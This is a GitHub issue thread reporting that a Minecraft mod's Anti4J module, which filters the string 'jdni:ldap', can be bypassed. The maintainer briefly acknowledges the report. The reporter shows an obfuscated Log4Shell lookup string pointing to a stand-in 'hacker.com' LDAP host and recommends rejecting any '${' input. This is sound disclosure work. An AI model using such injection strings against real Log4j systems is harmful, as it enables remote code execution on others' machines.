### ISSUE TITLE
Log4Shell mitigation bypass

### ISSUE THREAD

**Issue by Xiddoc** [Destruc69/FallenUtilMod#1]
**Describe the bug**
Log4Shell mitigation bypass.

**Expected behavior**
The author of the module intended to prevent the Log4Shell attack. However, the mitigation method used is not sufficient and can be bypassed.

On [this line](https://github.com/Destruc69/FallenUtilMod/blob/a284e3d52be05b2eb71105c18fcba94d0ccd4744/ForgeWurst%20MC%201.12.2/src/shared/java/net/wurstclient/forge/hacks/Anti4J.java#L40) and [this line](https://github.com/Destruc69/FallenUtilMod/blob/a284e3d52be05b2eb71105c18fcba94d0ccd4744/ForgeWurst%20MC%201.12.2/src/shared/java/net/wurstclient/forge/hacks/Anti4J.java#L50) of code, there was an attempt to mitigate the Log4Shell attack by preventing the string `jdni:ldap`, however this can be easily bypassed by obfuscating the query with another format string like so:

```raw
${${lower:j}dni:ldap://hacker.com/virus}
```
This will be evaluated to:

```raw
${jdni:ldap://hacker.com/virus}
```
... which will then be executed (as there is no filtering at this stage).

**Solution**
While the best way to mitigate the vulnerability is to upgrade the relevant module(s) (Log4J, etc.), if that is not possible, then filtering more is better than filtering less- therefore I would suggest to ignore any formatted strings at all (any message that includes `${`).

**Comment by Destruc69** [comment]
Thank you for this, i will enhance the Module ASAP.
